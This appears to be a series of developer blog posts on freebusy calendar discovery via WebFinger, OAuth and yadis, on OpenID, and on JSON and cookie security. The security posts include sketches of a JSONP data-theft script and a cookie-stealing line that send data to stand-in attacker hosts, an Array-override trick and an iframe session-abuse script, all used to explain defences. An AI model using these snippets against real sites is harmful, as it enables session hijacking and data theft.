WebFinger, OAuth and Freebusy lookups

One of the more frustrating aspects of calendaring systems is that freebusy lookups are all proprietary. Meeting invitations can be sent from one system to another (assuming you already know a time to meet), but it is not possible to look up when someone on LotusLive, someone on Gmail and someone on Yahoo are all available to meet. In the corporate space this type of scheduling is invaluable.

The format for looking up someone’s freebusy time is included in a standard that was completed back in 1998, but it punted on all the hard stuff. The hard bit, as I have mentioned before, is working out where someone’s freebusy data is stored on the web and then authenticating with that store in a manner that can be verified. WebFinger and OAuth now put the complete round trip within spitting distance.

Below I’ll propose an approach to scheduling a meeting with my mom (who uses Gmail) from LotusLive (which I use). I will be rob@robubu.com (but using LotusLive as my calendaring service) and my mom is mom@gmail.com. We’ll also assume that my mom has told Google that it can share her calendar free-time data with anyone in her contact list, and that I am in her contact list.

  1. I head into my calendar service (on LotusLive), click on Add Event and type mom@gmail.com into the invitees list.
  2. LotusLive now uses WebFinger to look up the different API services that Google provides for access to my mom’s data, along with the corresponding URL for each service. The details of how this works are outlined here on Eran’s blog. At the end of this, LotusLive gets back an XRD document that looks something like the following.

    <?xml version='1.0' encoding='UTF-8'?>
    <XRD xmlns='http://docs.oasis-open.org/ns/xri/xrd-1.0'>
        <Subject>acct:mom@gmail.com</Subject>
        <Alias>http://www.google.com/profiles/mom</Alias>
        <Link rel='http://portablecontacts.net/spec/1.0'
              href='http://google.com/api/people/' />
        <Link rel='http://ietf.org/icalendar/freebusy'
              href='https://google.com/api/calendar/mom/freebusy/' />
    </XRD>

    From this LotusLive can now determine that my mom’s freebusy endpoint is at https://google.com/api/calendar/mom/freebusy/. It concludes this by looking for the link with a rel attribute of http://ietf.org/icalendar/freebusy.
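
    To make that concrete, here’s a minimal sketch of the extraction step (in TypeScript, which the original post doesn’t use). The rel value comes straight from the example XRD above, and the DOMParser usage assumes a browser-style environment.

    const FREEBUSY_REL = 'http://ietf.org/icalendar/freebusy';

    // Given the XRD text returned by the WebFinger lookup, find the
    // freebusy endpoint by matching on the Link rel attribute.
    function findFreebusyEndpoint(xrdText: string): string | null {
      const xrd = new DOMParser().parseFromString(xrdText, 'application/xml');
      for (const link of Array.from(xrd.getElementsByTagName('Link'))) {
        if (link.getAttribute('rel') === FREEBUSY_REL) {
          // e.g. https://google.com/api/calendar/mom/freebusy/
          return link.getAttribute('href');
        }
      }
      return null; // no freebusy service advertised for this account
    }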

  3. If my mom had made her free-time calendar data public then LotusLive could simply retrieve the data from the URL, but to add to the complexity let’s assume that it requires authentication, i.e. LotusLive needs to prove to Google that it has rob@robubu.com at the browser, and then Google checks that rob@robubu.com is in my mom’s contact list. We’ll do something here very similar to what signed fetches do in OpenSocial, i.e. LotusLive will use OAuth to assert that it has rob@robubu.com at the browser. What we’ll end up with is a URL that looks something like

    https://google.com/api/calendar/mom/freebusy/
    ?opensocial_viewer_id=rob@robubu.com
    &xoauth_public_key=https://lotuslive.com/keys/publickey.crt
    &oauth_signature_method=RSA-SHA1
    &oauth_signature=djr9rjt0jd78jf88%26jjd99%2524tj88uiths3

    LotusLive has here claimed that it has rob@robubu.com at the browser and, using OAuth, has signed the request with its private key. It has also indicated where the public key that validates the signature can be retrieved.
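
    For the curious, here’s a rough sketch of what the signing side might look like. It is not a faithful OAuth implementation: the signature base string construction is simplified, and the parameter names simply mirror the example above.

    import { createSign } from 'crypto';

    // Rough consumer-side signing sketch (a real OAuth implementation
    // normalizes and sorts the parameters into a precisely specified
    // signature base string; this is a simplified equivalent).
    function signedFreebusyUrl(endpoint: string, viewer: string, privateKeyPem: string): string {
      const params = new URLSearchParams({
        opensocial_viewer_id: viewer,
        xoauth_public_key: 'https://lotuslive.com/keys/publickey.crt',
        oauth_signature_method: 'RSA-SHA1',
      });
      const baseString = `GET&${encodeURIComponent(endpoint)}&${encodeURIComponent(params.toString())}`;
      const signature = createSign('RSA-SHA1').update(baseString).sign(privateKeyPem, 'base64');
      params.set('oauth_signature', signature);
      return `${endpoint}?${params.toString()}`;
    }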

  4. Google receives the request, retrieves the public key and verifies the signature. If it trusts signatures and keys from LotusLive (verifiable by retrieving certs from an https URL in the lotuslive.com domain) then it is done at this point. However, that is a fairly large amount of trust to place in LotusLive, as LotusLive could assert any identity this way. Google really needs to check that LotusLive is entitled to assert rob@robubu.com’s identity. Here we’ll use WebFinger again.
  5. Google now does a WebFinger lookup on rob@robubu.com and gets back an XRD document such as the one below.

    <?xml version='1.0' encoding='UTF-8'?>
    <XRD xmlns='http://docs.oasis-open.org/ns/xri/xrd-1.0'>
        <Subject>acct:rob@robubu.com</Subject>
        <Link rel='IDP' href='https://lotuslive.com' />
    </XRD>

    Google now sees that lotuslive.com is a valid identity provider for rob@robubu.com and so accepts the assertion.
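
    A sketch of that check on Google’s side might look like the following. The 'IDP' rel value mirrors the example document above, and I’m assuming the signer is identified by the origin of its public-key URL.

    // Provider-side sketch: given the XRD fetched for the claimed account,
    // check that whoever signed the request (identified here by the origin
    // of its public-key URL) is listed as the account's identity provider.
    function signerIsAccountIdp(xrdText: string, signerOrigin: string): boolean {
      const xrd = new DOMParser().parseFromString(xrdText, 'application/xml');
      return Array.from(xrd.getElementsByTagName('Link')).some(
        (link) =>
          link.getAttribute('rel') === 'IDP' &&
          link.getAttribute('href') === signerOrigin // e.g. 'https://lotuslive.com'
      );
    }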

  6. Google checks that rob@robubu.com is in my mom’s list of contacts and, as I am, returns her freebusy data.
  7. Finally, LotusLive gets a response from Google outlining my mom’s free time (presumably as iCalendar data; a sketch follows below) and displays it in a nice calendar. I can choose a time that she is free and send her an invite.
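
    That response would presumably be iCalendar freebusy data, something like the following sketch (the dates, times and product id are invented for illustration):

    BEGIN:VCALENDAR
    VERSION:2.0
    PRODID:-//Example//FreeBusy//EN
    BEGIN:VFREEBUSY
    ORGANIZER:mailto:mom@gmail.com
    DTSTART:20091201T000000Z
    DTEND:20091208T000000Z
    FREEBUSY:20091201T140000Z/20091201T150000Z,20091202T170000Z/20091202T183000Z
    END:VFREEBUSY
    END:VCALENDAR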

I know this is not perfect and I know there are probably a fair number of changes needed, but I wanted to jot down something that, I think, is fairly close to a workable solution. I am very interested in others’ thoughts.

p.s. WebFinger on email addresses already provides a means of discovering valid email addresses, though nowhere near as effectively as this does. The fight against spam can’t center on keeping email addresses undiscoverable.

Opensocial and OAuth specs

The REST API for OpenSocial makes its appearance in OpenSocial 0.8. The specification references some other specifications that are also worth a look.

OAuth Consumer Request – This is proposed as the means for server-to-server authentication between the consumer site and the service provider. It has the potential to replace basic auth over SSL, which is the only real standards-based approach for securely authenticating with a shared secret, given that digest auth was underspecified.

XRDS-Simple – This also looks promising; it tackles the whole XRI / yadis discovery mess that OpenID 2.0 seems burdened with.

Facebook – an OpenID challenge

Facebook exists because a simple, usable federated identity system doesn’t. Wired’s challenge to tear down the social networking silos seems easier to meet if we had such an identity system, and I would think that the OpenID community would take up the reins and lead the charge.

I was therefore somewhat aghast when I saw the original Mr. OpenID and the current Mr. OpenID trying to solve the problem without actually building atop OpenID. Why? Have they abandoned their offspring? Or is OpenID just not the right foundation and in need of a reboot?

The Wired article points out that it’s pretty trivial to assemble Facebook as long as you don’t mind the entire world seeing what you are doing; your "friends" can even receive event notifications via feed readers, but then so can the rest of the world. Facebook’s real value, therefore, is an easy-to-use access control system, limiting who can view your photos, view your posts and get alerts. This access control system, dubbed the "social graph", is embodied as "friends" in Facebook and "connections" in LinkedIn.

So why can’t OpenID enable this in a distributed fashion? Surely OpenID should be the basis of any distributed access control system. Why can’t I, who chooses to be hosted on Facebook, befriend you on MySpace? Why can’t I receive notifications of your recent actions? Why can’t you view my profile? And why can’t all this happen without the prying eyes of the rest of the world? These seem like the problems that OpenID should be helping solve. So why didn’t Brad and David choose to build atop it, instead making its use optional?

I have to admit to worrying a little about OpenID’s direction. It can’t get close to the challenge thrown down by Wired, and instead of trying to address these very real problems in version 2.0 it has chosen to focus on incorporating an obscure naming scheme, which IMHO has introduced unnecessary complexity. So what could it do? Could the Wired challenge be solved with OpenID as the base? I believe the OpenID community could choose to solve these problems and, FWIW, here’s my list of to-dos.

  1. Adopt the world’s most popular naming scheme for individuals. Yes, I know there are privacy issues with using an e-mail address identifier, and yes, I know there are advantages to HTTP-based URIs, but there is a reason why the e-mail address is Facebook’s primary identifier. Ignoring it presents real usability and adoption challenges.
  2. Have OpenID work for REST-based web services, e.g. feed readers. The only way that friends can keep track of my latest posts / photos etc. in a distributed fashion is through feeds, and if I want to limit who can see them then the feed readers need to authenticate with my service. Unfortunately OpenID is designed for interactive user agents, and feed readers are anything but that. So please can we have OpenID designed to work with any HTTP client and not just the "interactive" ones (see the sketch after this list).
  3. Define the "befriend" protocol. This would be the mechanism that establishes and terminates the relationship between two identities, so they can view each other’s stuff. Instant messaging has this same problem, i.e. establishing who can view my current presence, so there are places to look for inspiration.
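
For to-do #2, here’s the kind of thing I mean, as a very hand-wavy TypeScript sketch: a feed reader fetching a protected Atom feed with a verifiable identity assertion instead of an interactive redirect dance. Every header and parameter name here is hypothetical; nothing like this exists in OpenID today, which is the point.

import { createSign } from 'crypto';

// Hypothetical: a non-interactive feed reader asserting, in a verifiable
// way, which identity it is fetching on behalf of.
async function fetchProtectedFeed(feedUrl: string, readerId: string, privateKeyPem: string) {
  const signature = createSign('RSA-SHA1')
    .update(`GET&${feedUrl}&${readerId}`) // simplified base string
    .sign(privateKeyPem, 'base64');
  return fetch(feedUrl, {
    headers: {
      'X-Reader-Identity': readerId,   // hypothetical header
      'X-Reader-Signature': signature, // hypothetical header
    },
  });
}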

I’m sure there are more details, e.g. how the "roster" of friends gets sent to the different services, but that also sounds familiar. It just seems to me that Brad and David are applying a band-aid with their proposal, and I’d much prefer they go back to open heart surgery and fix this thing once and for all.

An OpenID reboot? Hmmm, interesting, and if you read the entire thread, blush.

p.s. I don’t buy Dave Winer’s economic roadblocks to distributed social networks. The same argument could have been applied to AOL’s and Delphi’s email "walled gardens" prior to 1993.

Safe JSON

Update: March 5th 2007: Important change to the recommendation for Safe JSON detailed below. It is not as safe as people think, but it can still be made safe.

We have been investigating the security implications of having a JSON API in Connections. It turns out that it is very easy to leave pretty big security exposures in an application if it isn’t done right. The security exposure in this case is rogue sites being able to get at data made available via a JSON API. The truly frightening part is that applications installed on a corporate intranet can actually leak data to internet sites should a user visit a rogue site. BTW, these exposures apply equally to formally published APIs such as Yahoo’s and to any internal JSON APIs often used for AJAX tricks.

As far as I can make out there are three different approaches used with JSON APIs. Before detailing the vulnerabilities I’ll highlight the three approaches using the Yahoo examples (you might want to familiarize yourself with them before reading any further). The three approaches are:

Approach 1 – Plain JSON

Simply return JSON i.e.

{
  "Image": {
    "Width": 800,
    "Height": 600,
    "Title": "View from 15th Floor",
    "Thumbnail": {
      "Url": "http:\/\/scd.mm-b1.yimg.com\/image\/481989943",
      "Height": 125,
      "Width": "100"
    },
    "IDs": [ 116, 943, 234, 38793 ]
  }
}

Approach 2 – var assignment

Assign the JSON object to some variable that can then be accessed by the embedding application (not an approach used by Yahoo).

var result = {
  "Image": {
    "Width": 800,
    "Height": 600,
    "Title": "View from 15th Floor",
    "Thumbnail": {
      "Url": "http:\/\/scd.mm-b1.yimg.com\/image\/481989943",
      "Height": 125,
      "Width": "100"
    },
    "IDs": [ 116, 943, 234, 38793 ]
  }
}

Approach 3 – function callback

When calling the JSON web service, pass the name of a callback function as a parameter. The response then passes the JSON object as a parameter to this callback function.

callbackFunction({
  "Image": {
    "Width": 800,
    "Height": 600,
    "Title": "View from 15th Floor",
    "Thumbnail": {
      "Url": "http:\/\/scd.mm-b1.yimg.com\/image\/481989943",
      "Height": 125,
      "Width": "100"
    },
    "IDs": [ 116, 943, 234, 38793 ]
  }
})

All three approaches can be used via an XMLHttpRequest followed by a JavaScript eval, but as Yahoo points out, Approaches 2 & 3, unlike Approach 1, don’t "run afoul of browser security restrictions that prevent files from being loaded across domains", as…

"Using JSON and callbacks, you can place the Yahoo! Web Service request inside a <script> tag, and operate on the results with a function elsewhere in the JavaScript code on the page. Using this mechanism, the JSON output from the Yahoo! Web Services request is loaded when the enclosing web page is loaded. No proxy or server trickery is required."

Indeed they have successfully navigated the browser security restrictions, which is probably fine for Yahoo as ALL their services expose only publicly available data. However, if a developer coding up an application that contains private data uses the same approach (i.e. Approach 2 or 3) then they have exposed the application to a pretty simple attack. BTW, I’m defining private data to be any data that should not be publicly accessible to the entire world (this probably covers most data on a corporate intranet, but also includes any data that requires authentication prior to access). Here’s an example.

A user logs into a wiki on the corporate intranet. This wiki provides a JSON API with a callback function (Approach 3). The user then visits a rogue site on the internet. The page from the rogue site, when rendered in the user’s browser, performs a JavaScript include against the wiki’s JSON API, passing a callback function. This results in data from the wiki being made available to the rogue site’s JavaScript function in the page via the callback. Further JavaScript on the page can then form POST the data back to the rogue site, and so the data can be stolen. Not good.
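
To make the attack concrete, here’s roughly what the rogue page’s script could look like, sketched in TypeScript (the wiki URL and the callback parameter name are invented for illustration):

// The attacker's callback: whatever the wiki hands it gets shipped home.
function stolen(data: unknown): void {
  new Image().src =
    'https://rogue.example/collect?d=' + encodeURIComponent(JSON.stringify(data));
}
(window as any).stolen = stolen; // make it reachable as a global callback

// Equivalent of <script src="http://wiki.intranet/api/contacts?callback=stolen">.
// The browser fetches the URL with the victim's wiki cookies attached and
// executes the response, which calls stolen(...) with the private data.
const s = document.createElement('script');
s.src = 'http://wiki.intranet/api/contacts?callback=stolen';
document.body.appendChild(s);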

Approach 1, on the other hand, does not contain this vulnerability, as it can’t be used via a JavaScript include. If attempted, no data is made available to the page: a bare top-level object literal is not a valid JavaScript program (the opening brace parses as a block, and the first quoted key is then a syntax error), so the include simply results in a JavaScript error. Plain JSON is therefore safe for JSON APIs that contain private data.

Recommendation

I’m going to tentatively propose the following recommendation and would welcome feedback.

When developing a JSON API that serves data that should not be publicly accessible to the world, use Approach 1, i.e. return plain JSON. Update: The JSON returned MUST be of type "Serialized Object" and not of type "Array" (as defined by the JSON spec). (See the March 5th update below for the rationale behind this change.) If the data can be publicly exposed then Approaches 2 & 3 have significant advantages in terms of consumability.
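
As a sketch of what that recommendation means server-side (the wrapper key name is arbitrary):

// Ensure the top level of the response is always a serialized object,
// never an array; wrap arrays under an (arbitrarily named) key.
function toSafeJson(payload: unknown): string {
  const body = Array.isArray(payload) ? { data: payload } : payload;
  return JSON.stringify(body);
}

// toSafeJson([1, 2, 3])   => '{"data":[1,2,3]}'
// toSafeJson({ ok: true }) => '{"ok":true}'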

Update: March 5th 2007

Joe has pointed out that care still needs to be taken even when using a plain JSON return (Approach 1). From my testing, and as others have pointed out, the vulnerability that Joe is referring to only applies when returning JSON of type "array" (section 2.3 of the JSON standard). However, it appears that if you return JSON of type "serialized object" (section 2.2) then, at the moment, I know of no vulnerability. It’s worth mentioning that arrays can still be present in the JSON as long as they are not at the top level. The example in Approach 1 above is not vulnerable to attack even though it contains an embedded array. The following structure is vulnerable though:

[["ct","Your Name","foo@gmail.com"], ["ct","Another Name","bar@gmail.com"] ]

as Google knows only too well.
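
For anyone wondering how a bare array leaks, here’s a sketch of the trick as it worked in the vulnerable browsers of the day (notably Firefox, where evaluating an array literal invoked the overridable Array constructor; the collection URL is invented):

// Runs on the rogue page *before* the <script> include of the JSON URL.
const captured: unknown[] = [];
(window as any).Array = function (this: any) {
  // In the vulnerable browsers this constructor fired as the included
  // array literal was evaluated; index setters then saw each element.
  for (let i = 0; i < 100; i++) {
    this.__defineSetter__(String(i), (value: unknown) => {
      captured.push(value); // each element of the private array, as it lands
    });
  }
};
// Then: <script src="https://mail.example/contacts.json"></script>
// ...after which `captured` is shipped home. A top-level serialized
// object, by contrast, parses as a block and throws a SyntaxError.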

Anyway, I have updated my recommendation.  It remains tentative.

Freebusy and Yadis

So for a while now we have been trying to figure out a standard means to look up someone’s free time from their calendar (called freebusy in the calendaring world). We knew we wanted a REST service that could be passed URL parameters; we even had a demo one up on the net.

The problem, though, had always been how to figure out the URL for the service given the user’s e-mail address. OpenID, DIX, yadis et al showed promise, but it always felt clunky to have to first translate an e-mail identifier for the user into an HTTP URL based identifier and then ask for an attribute for the calendar service, etc. A recent proposal to the yadis mailing list, however, showed the way: simply resolve the e-mail address to its domain and use the yadis protocol (section 6) on that to discover a freebusy service for all the members of the domain.

So, for example, let’s say that the e-mail address of someone I want to schedule a meeting with is rob@robubu.com. Use the yadis protocol on http://robubu.com, i.e. retrieve the page at http://robubu.com and dereference the "X-XRDS-Location" meta tag in the html head to get back a yadis document (that looks something like this).

<?xml version="1.0" encoding="UTF-8"?>
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">
  <XRD>
   <Service>
    <Type>http://ietf.org/cal/freebusy/1.0</Type>
    <URI>http://robubu.com/calendar/freebusy.php</URI>
   </Service>
  </XRD>
</xrds:XRDS>

Then extract the endpoint for the freebusy service by looking for the URI that corresponds to a service of type "http://ietf.org/cal/freebusy/1.0". Finally, construct the URL request that returns the freebusy time in iCalendar format for a given period, e.g. http://robubu.com/calendar/freebusy.php?email=rob@robubu.com&start=20070101&end=20071212. Done.
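
Put end to end, the whole lookup is only a few steps; here’s a TypeScript sketch, assuming a browser-style DOMParser and fetch (error handling and the HTTP-header variant of X-XRDS-Location are omitted):

const FREEBUSY_TYPE = 'http://ietf.org/cal/freebusy/1.0';

async function lookupFreebusy(email: string, start: string, end: string): Promise<string> {
  const domain = email.split('@')[1];

  // Step 1: find the yadis document via the meta tag on the home page.
  const home = new DOMParser().parseFromString(
    await (await fetch(`http://${domain}/`)).text(), 'text/html');
  const xrdsUrl = home
    .querySelector('meta[http-equiv="X-XRDS-Location"]')
    ?.getAttribute('content');
  if (!xrdsUrl) throw new Error('no X-XRDS-Location meta tag');

  // Step 2: find the freebusy service endpoint in the XRDS document.
  const xrds = new DOMParser().parseFromString(
    await (await fetch(xrdsUrl)).text(), 'application/xml');
  const service = Array.from(xrds.getElementsByTagName('Service')).find(
    (s) => s.getElementsByTagName('Type')[0]?.textContent === FREEBUSY_TYPE);
  const uri = service?.getElementsByTagName('URI')[0]?.textContent;
  if (!uri) throw new Error('no freebusy service advertised');

  // Step 3: ask for the freebusy time in iCalendar format.
  const res = await fetch(`${uri}?email=${encodeURIComponent(email)}&start=${start}&end=${end}`);
  return res.text();
}

// e.g. lookupFreebusy('rob@robubu.com', '20070101', '20071212')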

I’ve also hacked a little on WebCalendar and got an endpoint up and running. The calendar in html is here, but if you want to schedule a meeting with me via yadis and the freebusy API then my e-mail address (for the purposes of the demo) is rob@robubu.com.

Finally, I do want to use the URI Template approach for the URI, but I’ll leave that for another post.

HttpOnly please – more

So my previous post described some of the challenges involved in maintaining security in a site, such as a blogging site, that allows unrestricted / unfiltered user-authored content, and suggested that "HttpOnly" cookies could mitigate some of the risk. "HttpOnly" cookies are, however, not a complete solution.

The remaining problem is described in one of the comments on the mozilla "HttpOnly" bug. Here’s a concrete example. I log into my blog at http://blogs.com/robyates. I then visit the blog http://blogs.com/attacker/. Let’s assume that I am using I.E. and that blogs.com uses "HttpOnly" cookies. The JavaScript on the attacker’s blog can’t get access to my "HttpOnly" cookies, so it can’t steal my session, but it can open a hidden iframe and then use this iframe to make posts, add spam, etc., and given that I have an authenticated session it can do all this under my identity. Pretty bad. It can do this because the attacker’s blog and my blog are in the same domain, i.e. http://blogs.com.
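
Here’s a sketch of that attack (the management URL and form field names are invented for illustration):

// Script on http://blogs.com/attacker/: same origin as the victim's
// management pages, so the iframe's document is fully scriptable.
const frame = document.createElement('iframe');
frame.style.display = 'none';
frame.src = 'http://blogs.com/robyates/manage/new-post'; // hypothetical URL
frame.onload = () => {
  const doc = frame.contentDocument!; // allowed: same origin (blogs.com)
  (doc.querySelector('textarea[name="body"]') as HTMLTextAreaElement).value = 'spam...';
  (doc.querySelector('form') as HTMLFormElement).submit();
  // The post goes out under the victim's authenticated session; HttpOnly
  // never enters into it because no cookie was ever read.
};
document.body.appendChild(frame);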

Fortunately, this problem is well understood by the large public blogging services such as LiveJournal. Their approach gives each user their own domain, and this domain is separate from the management domain. So, for example, my blog could now be http://robyates.blogs.com, the attacker’s is http://attacker.blogs.com, and my blog is managed at http://manage.blogs.com/robyates. Now, due to cross-frame scripting security, which also applies to XMLHttpRequests, the JavaScript on the attacker’s site is rendered useless. Any JavaScript running on the attacker.blogs.com domain can’t get access to the data on the robyates.blogs.com or manage.blogs.com domains, so my postings can’t be deleted and spam can’t be added.

The key point, when designing an application that permits user-supplied html, is to segment the application into discrete security regions and assign each region a unique domain. This way any malicious JavaScript is constrained to some subset of the complete application.

So, in combination with carefully constructed domain partitioning of the application, "HttpOnly" cookies show real potential. With any luck we’ll see them show up in firefox real soon, as the bug looks to be heading in the right direction.

Finally, having recently learnt all about this so we can recommend topologies for our new blogging application, it’s got me thinking about how secure any JSON-based API is. Scary stuff!

HttpOnly please

I am currently working on a multi-user blogging application for corporate deployment. One of the more interesting challenges is how much flexibility we should allow blog posters with their content. Do we allow them to post JavaScript, and if we do, what do we do about XSS vulnerabilities?

Here’s the problem: a user can make a blog post containing any JavaScript (a property we want to preserve so that we can populate the blog with fancy charting and other tricks only available through JavaScript). This post can mount XSS attacks against any user viewing it. At first glance this doesn’t seem like much of a problem, since the attacker only gets to sniff their own blog, but they also get access to the viewing user’s cookies, and in a corporate environment, which may be utilizing single sign-on, that opens up a big hole in the form of session hijacking.
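
The hijack itself is a one-liner. A post containing something like this (collection URL invented) quietly ships every viewer’s cookies off-site:

// Without HttpOnly, document.cookie includes the session cookie, and an
// image request smuggles it out past any same-origin restrictions.
new Image().src =
  'https://attacker.example/steal?c=' + encodeURIComponent(document.cookie);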

So what to do? Google turned up what seems like a really nice solution in IE, and it’s a solution that appears to be gaining momentum. Essentially, it allows a cookie to declare that it is not available to JavaScript in the browser, so session hijacking becomes practically impossible. It does this by simply adding HttpOnly to the end of the Set-Cookie header, e.g.

Set-Cookie: USER=123; expires=Wednesday, 09-Nov-99 23:12:40 GMT; HttpOnly

Done, right? ………… WRONG. It turns out that there are a few things that still need to fall into place. The firefox community has been debating exactly how to implement it since 2002. Then there’s the need to be able to set it from Java, uh oh, and we still have to figure out what support we get from the cookies set by WebSphere, Netegrity, WebSEAL et al.

Anyway, it shows a fair bit of promise, and yes, I know it doesn’t shut down all the vulnerabilities, but it is a step in the right direction and something we’ll certainly be looking into in more detail.